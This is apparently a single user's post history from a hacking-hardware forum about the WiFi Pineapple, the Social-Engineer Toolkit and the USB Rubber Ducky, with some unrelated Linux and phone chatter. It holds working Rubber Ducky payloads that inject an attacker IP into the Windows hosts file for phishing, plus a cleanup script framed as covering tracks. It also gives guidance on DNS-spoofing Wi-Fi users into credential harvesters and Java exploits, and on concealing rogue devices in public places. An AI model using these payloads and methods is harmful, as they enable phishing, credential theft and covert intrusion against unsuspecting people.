skimpniff
-
Posts
76 -
Joined
-
Last visited
-
Days Won
1
Posts posted by skimpniff
-
-
Damn, I hate being behind the 8 ball.
-
I will take a look, thanks!
-
Saw this today
http://gizmodo.com/5928189/this-innocent+looking-power-strip-can-hack-almost-any-computer-network
Seems like it might have some familiar qualities.
-
Hey guys,
I was wondering if this (or something like it) is something that could be implemented as a Pineapple Bar menu item. It seems like it would quite handy to have this auto-configured right from the box, for say dead drops that want to anonymously dial back to your relay server.
-
This is a pretty good resource for linux distros.
If the new Unity/GNOME UI bothers you, give xubuntu a try.
I'll check the link out. I am not bothered by Unity/Gnome, it's just that 12.04 has some (currently) unresolved bugs that cause GPU hangs and rendering issues that always end in a hard reboot.
-
Hey guys i have a slight problem. I am going to get either a iphone 4 16 gb and a htc nexus 1, and i was wondering which is better Android (YEAH!!!) or iOS (hissssssssssssss)? On a side note is there any way i could unlock a iphone with the fallowing specs?
Iphone 4
5.0.1
04.11.08 Modem Firmware
I already tried sam and ultra snow?
Thanks guys! :D
I've been an Android user since the beginning (currently have the DINC2 and an Asus Transformer), however, my wife has an iPhone 4 and an iPad 2. They both have their merits, but I am a much bigger fan of Android by far. Waay more diversity in what you can do to/with it. Her iOS products have always been reliable for a basic user although the lack of Flash support has caused her a lot of aggravation, especially when she sees my device has no issue with it. If you like to hack and mod, I hear both are fun and will do what you want, I have only rooted and reflashed ROMs on Android though so I can't speak to the Jailbreaking side of the house. It is fun to be able to switch between ROMs whenever you like should you get bored with what you've got. Oh yea, and no widgets for iOS which totally blows in my opinion.
-
What's up crowd. When I first wanted to get into the Linux side of the house I decided on Ubuntu and sort have just stuck with it. I have finally gotten fed up with Precise not working with my system since the upgrade (constant GPU hangs being the front runner) and am looking to switch over to a new, clean install. Mint seems to be the top rated out thee at the moment, but since it is based on Precise, I am afraid I will encounter the same graphics issue. Does anyone have any ideas/suggestions/opinions on a smooth reliable distro. I am primarily looking for reliability, but a little sex appeal on the GUI would be nice too. I am not overly fond of Unity/Gnome 3, but I am not a hater either. It works, but I also have no qualms with Gnome 2 on my BT5R2 system. I may even just roll back to a previous version of Ubuntu if nothing else presents itself as a viable option.
Will be running on a Tosh Sattelite with Intel graphics, 8GB RAM.
-
That was a good read. Although, I think he would have definitely made the deadline of a month had he not gotten so lazy with his connections to his computers. To me that's what really gave him away.
Having a remote office to connect to through a secure connection and then surfing using Tor would be a great way to hide your true IP, but the cost of running a remote office would likely be impractical. Considering that Tor also does not require any installation he could have ditched his personal laptop, and instead could have visited internet cafes and used Tor rom those locations.
But that was a great read.
I agree, complacency seems to be the common thread in the people getting caught (the skilled ones anyway). Combine that with some ego and you're toast. As for having a dedicated office, that's not feasible, but there are other ways that could potentially accomplish the same effect. Just throwing out ideas off the top of my head, you could use a compromised computer at a big box store like BestBuy or have an old crappy laptop/netbook dead-dropped somewhere with a static IP, or a non-attributable VPS setup. Then just do the standard stuff already dead-horsed in this thread (TOR both ends before reaching the middle etc.)
-
This is an interesting article in general, but there is a part that relates to this conversation. Give it a read.
http://www.wired.com/vanish/2009/11/ff_vanish2/
Fortunately, while I was shocked by the intensity of the pursuit, I had anticipated the tactics. To keep my Web surfing from being tracked I often used a piece of free software called Tor, designed to protect the Internet activities of dissidents and whistleblowers around the world. Tor masks a computer’s IP address by diverting its requests through designated routers around the world. So when I logged in to Gmail from IP 131.179.50.72 in Los Angeles, the logs showed my request originating from 192.251.226.206 in Germany.
But as my friend from Google had reminded me, no security is unbreakable, so I’d added another layer: Vegas. I used the laptop I carried with me to log in remotely to my computers there, using free software from LogMeIn.com. The Vegas machines, in turn, were running Tor. Anyone clever enough to untangle those foreign routers would get only as far as a laptop sitting in an empty office on South Pecos Road.
The take away being to have a physical air gap somewhere along with another layer of remote access. Harkens back to the train station scene in Hackers where they have the payphones taped together.
-
Yep, that's the idea. Have a static relay service in the cloud where by your pineapple and roaming laptop can meet and be friends.
I'd love to hear more about your adventures in dropbox land. It's one of the features I've been meaning to give greater attention. I don't have a unit in front of me but I believe the WAN port will get an address from DHCP, thereby getting you on most networks.
Unfortunately I cannot confirm that the reverse SSH connection back to home base is made only through the 3G interface. It would seem so as long as the network plugged into the WAN port doesn't become the default gateway, but again I haven't checked. Would want to make sure since the organization you're pen-testing is likely running some sort of IDS or egress filtering and SSH traffic triggers red lights.
Will play around more with this as I finish the first edition of the pineapple book and focus on actual workflows for the next one. Please report back! Cheers :)
Thanks Darren. I hadn't really considered using both to be honest. I was thinking the scenarios in the OP would be separate, so the question of whether the 3G or the WAN port would be the default hadn't occurred to me.
Your episode regarding the 3G dongle answered all of my questions on that front. You're right about the other scenario being the more challenging because of the aforementioned IDPS likely to be present and the bells and whistles it will set off. I suppose in that case dialing out would be less of an immediate concern, since if you have physical access enough to get a wireless tap installed, staying close enough to connect shouldn't be too big of a problem. That being said, it would be nice to be able to not be the weird guy camped out on his laptop all day in the lobby.
Once I get my DNSspoof loop situation hammered out, I am going to work on trying to combine these two ideas. I think having a dropbox that can connect to a remote SET server could have some potential. I'm sure the latency issues if it worked would prove challenging, but it would still be cool.
I'll keep on keeping on and if I figure out anything worth sharing I'll post it.
-
Just use the social engineering toolkit (SET) and don't re-invent the wheel. I talk bout it more in my post here:
-
Ok, so I have found some interesting and relevant items while poking around the SET config folders. I thought I'd post what I found here, partly because it is relevant to the topic and partly because I have seen the question "Where does SET put the cloned site" in half a dozen posts across the web.
Disclaimer: This is for Backtrack5 R2
So first, when you use the site cloner option in SET, the cloned site html file used for the exploit is:
/pentest/exploits/set/src/program_junk/web_clone/index.html
Second, the config file for SET that dictates which web templates to use and where to redirect the victim if a particular template is used (including web cloner) is:
/pentest/exploits/set/src/html/templates/template.py
For applicability of this post, the existing templates (for facebook at least) appear to be a little out of date so I recommend running an exploit of your choice and selecting site cloner for the site of your choice. Then navigate to option one above, copy the index.html file to the template folder relative to the site you just cloned. If you are using a page that already has an existing template, just copy it overate[/b]. If you are going to make your own template folder, don't forget to append the template.py file appropriately.
Next is theory at this point because I haven't actually tried a full test, but I have tried stages independently and I believe it will work. Once I confirm or deny I'll update the post.
In the template.py file the last line of each template command tells SET to redirect to the actual website after executing the script and uses the full URL (ie "http://www.facebook.com"). If the last line is changed to the IP address instead of the URL, SET will successfully send the browser to the correct website via the IP vice the URL, preventing DNSspoof from looping it back around to SET again.
If this solution alone still doesn't work, I'll try changing the DNSspoof command from
192.168.1.x *facebook.com
to
192.168.1.x http://www.facebook.com
192.168.1.x www.facebook.com
This way, even if the IP is converted to the URL by the browser, it should still work because the IP addresses for facebook all navigate to https://www.facebook.com.
If anyone tries this before I get a chance to, please confirm or deny success.
UPDATE: No luck so far.
-
I see.
I was thinking that why are we using dnsspoof when redirecting everything? "172.16.42.1 *" especially when the device remembers the actual ip address and completely bypasses dns and any rolls you want them to connect to, an iptable rule should redirect everyone to 172.16.42.1
I think It would be cool to have a module/built-in-tool that could check the dhcp list of users connected to the pineapple and indevidually set iptable rules to redirect them to 172.16.42.1 and a way to black/white list, as well as settings to undo the redirect after a condition is met and a way for other modules/tools to communicate to enable/disable all or one client.
I believe this would work.
Yea, all regular traffic would be running through the pineapple "business-as-usual" on the 172 network, having whatever pineapple salad you want fed to it. DNSspoof would be on, but only to grab example.com and throw it over to the MITM machine hooked up via ethernet (in this case: 192.168.1.8 *example.com) for SET to work it's magic (via port 80 where SET establishes it's own server) then throw it back into the wild with a new passenger (Java exploit) or a little lighter (captured creds).
As for a pineapple tool to help, would it be feasible to have the pineapple (DNSspoof) determine if the user was already spoofed and not repeat the spoof (like Dave mentioned)? For example:
target A connects to WifiPineapple and tries to got to example.com.
DNSspoof recognizes example.com and sends target A to 192.168.1.x (SET).
SET exploits target A and redirects to example.com.
DNSspoof detects target A has already been spoofed and ignores Target A allowing target A to connect to real example.com.
target A updates status on example.com, complaining about how slow WifiPineapple is, but at least its free internet.
Hilarity ensues.
The exploits work now, and if the operator were to disable DNSspoof after the exploit, the target would go about their merry way unaware. As it stands now, when the target is redirected from SET, a "page not available" shows because of being caught in the web again. The ideal situation would be to not have to manually disable DNSspoof so you can catch more than one phish and allow the process to remain automated.
-
Watch the recent hak5 episodes,one of the(can't remember which) covers autossh and reverse ssh tunnels, if you are on the move it makes no difference, the pineapple will forward its local ssh port to the remote port on a virtual private server (visit lowendbox.com for some good deals) and you 'connect' to the pineapple, this method circumvents firewalls and blocked ports (3g providers are crafty buggers) you will need to tweak the ssh server settings to prevent timeouts, but Darren does cover all this in his episodes.
Thanks for the reply. I will take a look at those and see what I see. If I am still confounded I'll be back to ask more questions. This is exactly what I was looking for, thanks again.
EDIT: For those with the same question, here is the episode:
-
why are you running dnsspoof when you are using other tools that redirect test victims?
how about not redirecting everyone, just redirect what dns's you want for dnsspoot, leaving out example.com
The idea is to use the pineapple for traffic analysis (or any other Pineapple salad), but have targeted users redirected to SET for exploit via the bevy of tools SET offers. This could be for a couple of reasons,
1) negating the need for spear phishing/trying to get a target to click a link (ie all attempts to get to facebook trigger an exploit)
2)facilitating a social engineering/spear phishing attack (ie an email targeting WinXP/7 users with a real link such as microsoft.com that is then redirected, vice the more complicated option of constructing a believable link to a fake server address). This would allow more attack vectors to occur simultaneously, traffic analysis and java attack for system exploit to name a couple.
Also, by using the Pineapple the attacker would not need to gain access to a specific network and negotiate any of the possible roadblocks presented, and would also be able to remote deploy the attack multiple times in multiple places with reduced setup time.
I got a reply from Dave Kennedy when I asked the same question, his response:
...no workaround as of yet, I need to rehaul the backend so that after a certain counter is hit from an IP it kills the dnsspoof portion of it by replacing the legit hacker site with the real one...and redirects back to victim. it's a bit challenging and not an easy one.. I'll get to it when I can =)
-
This is way noob, I know...please forgive me.
How do you connect to your Pineapple in the wild under these circumstances?
- Pineapple connected to internet via 3G dongle.
- Pineapple connected to internet via an Ethernet port that you do not control. (ie. plugging into an accessible port in the target organization)
I know AutoSSH is the key, but I have little experience with reverse SSH connection. I would like to practice standalone pineapple deployment in a target rich "test" environment and be able to successfully remote access/interface from a separate network.
Additional questions on this front, if you are mobile (say using a laptop and multiple open networks as you travel) and the pineapple is stationary, how would you have the pineapple find you to dial back? If you do not have a static ip (due to travel or a proxy), how could you resolve this?
- Pineapple connected to internet via 3G dongle.
-
Awesome, thank you for the feed back guys. I have definitely looked at the Otterbox options, however, the reason I am considering the one previously listed is because it is also weather proof, but would blend in more with exterior building hardware. Hypothetically, a Mk4 with a 3G dongle and a battery pack could be magnetically or otherwise attached near gas meters, power boxes, or sprinkler control boxes of local coffee shops or a campus location of your choice and draw little or no notice to the casual observer. I AM also looking at interior camouflage options, but in most settings, another blinking box near the server room or printer bay would probably be overlooked as well.
-
Pineapple Hardware Version: Mark IV
Pineapple Software Version (ex: Shmoocon Beta, 1.0, etc.):2.3.1
OS used to connect to the pineapple:Backtrack 5 R2
Network layout of how your setup is connected (including IP information):default ICS via ethernet
All the tools/options that are running on the pineapple when the issue happened: DNSspoof
Is the problem repeatable (Yes/No):Yes
Anything else that was attempted to 'fix' the problem:
Greetings,
I have searched message boards galore and not found a satisfactory answer yet. I am trying to resolve the DNSspoof "loop" issue faced when using it to connect to SET. I am specifically trying to resolve this using the Wifi Pinapple Mk4. Obviously if the *example.com command is used, the redirection from SET to the legitimate page will be captured in the DNSspoof parameters thereby catching the victim in a loop and reducing the "ninja" factor of the attack. Do you have a suggestion or perhaps know of a discussion that already exists that addresses this issue successfully? I have tried using the IP address in lieu of example.com (in the DNSspoof parameters), but that does not seem to work. I have also thought about replacing the redirect address for SET to the IP vs the URL, but have not had the opportunity to try it yet. Is this idea something that would need to be attempted from a template, or is it possible to modify the cloned site created when using the "clone site" option in SET.
The setups I have used so far are:
Initiate standard SET setup for credential harvester in BT5R2, using site cloner. IP = 192.168.1.8:80
The following DNSspoof commands in Pineapple:
- 192.168.1.8 *example.com (credential harvest success, redirect failure)
- 192.168.1.8 IP Address for example.com (failure to connect to SET)
EDIT: I realize now this wouldn't work because nobody types in the IP to navigate anywhere. (Duh).
- 192.168.1.8 *example.com (credential harvest success, redirect failure)
-
Hello community. I am considering getting this
http://www.amazon.com/WLanParts-Enclosure-9X6x3-Outdoor-1-Port/dp/B004EI0E6O/ref=pd_sbs_hi_1
for covert deployment of the pineapple. Has anyone experimented with the battery-packed Pinapples in an enclosure? I know Darren did a segment using an Otterbox but considering this would be used for outdoor use (say around the local coffee shop or campus)there is the high probability of exterior adding to any natively generated heat. Is there any risk of burning out the electronics or battery pack?
Thanks.
-
I have used this technique taken from http://www.thedr1ver.com/2011/04/credential-harvesting-with-facebook-and.html
It doesn't answer your DNS Spoof question, but gives an alternative to the problem of getting a victim to bite.
Now, obviously most people will not click on a link that looks like a random IP address. However, there are multiple ways to disguise that link. My favorite of which is converting the IP address into a bit.ly link. To do this, copy your external IP address and go to http://bit.ly/. Paste the external IP address and click the 'shorten' button. This will convert the link to something like http://bit.ly/900913 that looks a bit more friendly than a raw IP address. Then, you can feel free to add it to a specially crafted email sent to your victim, or cast a wider fishnet and post a Tweet like:
@Phisherman123: Shooting at Fells Point Pirate Festival http://bit.ly/ysqb.
First a quick hello as this is my first post on the forum, and a quick thanks for all the help I will be getting.
Here is the setup. I setup a wireless LAN, one attacker with BT5r2 and one Win7 victim PC. I use SET Credential Harvester to setup duplicate webpage. If I type in the attack PC IP address into the victim browser everything works great, first log in attempt fails, forwards the credentials to the attack PC, then presents the victim PC with the real site in which I can then log in.
To make the attack more convincing, I chose to use ettercap to do some dns spoofing. So I edit the etter.dns file to send the victim PC to the attack PC when they type in X site. Now the victim can browse to said site, get redirected to the fake Credential Harvester site, and the browser address bar shows the site they typed in rather than the attack PC's IP address, everything is good up to here.
The problem. When Credential Harvester sends the victim PC to the real site after the first log in attempt, ettercap then again spoofs the site and sends that second request back to the attacker, and Credential Harvester has already shut down the fake site after getting the credentials, so to the victim PC it looks as if the site is down. So I have fixed the one problem of the browser bar not showing the legit site name, but in turn caused another by ettercap not allowing the victim PC to continue to the legit site.
Is there any way around this? Maybe some type of scripting I can do with ettercap, or am I re-inventing the wheel and there is already a better way to do this? I know one way is to just use ettercap with SSLstrip, but I want to specifically get this targeted attack working.
Thanks for your help,
Ech3l0n
-
Hi everyone,
This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script:
REM Author: .:Koryusai-Kun:. REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows REM Description: so when the user types into there web browser for example www.facebook.com it REM Description: insted of going to the proper ip it gose to the one in the host file your evil one. REM Description: you need to add the www. version and with out it as well. REM ---[Start CMD as administrator]----------------------- GUI DELAY 50 STRING cmd DELAY 150 MENU DELAY 75 STRING a Enter DELAY 200 LEFT ENTER STRING cls ENTER REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- DELAY 200 STRING exit ENTER
Here is a cleanup script. Very simple for if you want to reset the hosts file to empty to cover your tracks.
REM Author: skimpniff
REM Description: Clean up by resetting the hosts file back to empty and deleting the inject.bat file
ESCAPE
CONTROL ESCAPE
DELAY 600
STRING cmd
DELAY 1000
MENU
DELAY 1000
STRING a
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 400
STRING cd drivers\etc\
DELAY 400
ENTER
DELAY 400
STRING copy con hosts
DELAY 400
ENTER
ENTER
DELAY 400
STRING All
ENTER
ENTER
DELAY 400
CONTROL z
DELAY 400
ENTER
DELAY 400
STRING exit
ENTER
Here is a modification to add to bottom of the original that deletes the inject.bat file
CONTROL z
ENTER
DELAY 400
STRING inject.bat
ENTER
DELAY 400
STRING del c:\windows\system32\inject.bat
ENTER
DELAY 400
STRING exit
ENTER
-
Based on the original script by Koryusai-Kun written for Win7
I take minimal credit for this, I only took a great script and modified it for XP.
Darren, how do we get new payloads onto the GitHub site? Through you or is there a more direct way?REM Author: .:skimpniff:. REM Based on the original script by Koryusai-Kun written for Win7 REM Modified for use on WinXP REM Description: Used for phishing, it add's ips of your choosing to the hosts file on windows REM Description: so when the user types the website into there web browser it redirects them REM Description: to your evil IP. Works perfectly in conjunction with SET. REM Description: Don't forget to add both versions, with and without the www prefix. GUI r DELAY 600 STRING cmd DELAY 400 STRING cd %WINDIR%\system32\drivers\etc\ DELAY 400 STRING copy con inject.bat DELAY 400 ENTER DELAY 400 STRING SET NEWLINE=^& echo. ENTER DELAY 400 STRING FIND /C /I "WEBSITE" %WINDIR%\system32\drivers\etc\hosts ENTER DELAY 400 STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS WEBSITE>>%WINDIR%\system32\drivers\etc\hosts ENTER STRING FIND /C /I "www.WEBSITE" %WINDIR%\system32\drivers\etc\hosts ENTER DELAY 400 STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS www.WEBSITE>>%WINDIR%\system32\drivers\etc\hosts ENTER DELAY 400 CONTROL z ENTER DELAY 400 STRING inject.bat ENTER DELAY 600 STRING exit ENTER
-
This is a great find! I like it.
But it must be used in login user at first time. How can i bypass login? That is, I use it when not login.
thanks.
This is my go-to.
-
Hi everyone,
This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script:
REM Author: .:Koryusai-Kun:. REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows REM Description: so when the user types into there web browser for example www.facebook.com it REM Description: insted of going to the proper ip it gose to the one in the host file your evil one. REM Description: you need to add the www. version and with out it as well. REM ---[Start CMD as administrator]----------------------- GUI DELAY 50 STRING cmd DELAY 150 MENU DELAY 75 STRING a Enter DELAY 200 LEFT ENTER STRING cls ENTER REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- DELAY 200 STRING exit ENTER
I've not been able to get this to successfully execute. Can anyone confirm it's successful operation? I tweaked the delays and it works like a charm. My next project related to this is a quick edit to this that will include the commands necessary (replying "yes") to overwrite the existing hosts file.
For those not familiar, if you successfully execute this command and try to run it again, you are prompted with a command line prompt asking for permission to overwrite the existing file. As soon as I have it tested and working, I'll post it. I went a simpler route, see the following post.
Switching Linux Distros
in Everything Else
Posted
Thanks for all of the insight everyone. I ended up going with Mint 13 with Cinamon and I haven't had any problems at all, I really like it. It is amazing how much snappier it is compared to Ubuntu 12.04. Ubuntu really borked this last upgrade IMO, the issues with my GPU hangs were limited to Precise. I have not had the problem repicated in any other distro. I respect the decision to try to make a mobile paltform ready distro, but I think they are missing some fundamental small stuff in the process. I hope the commercial asperations don't take them down the MS path.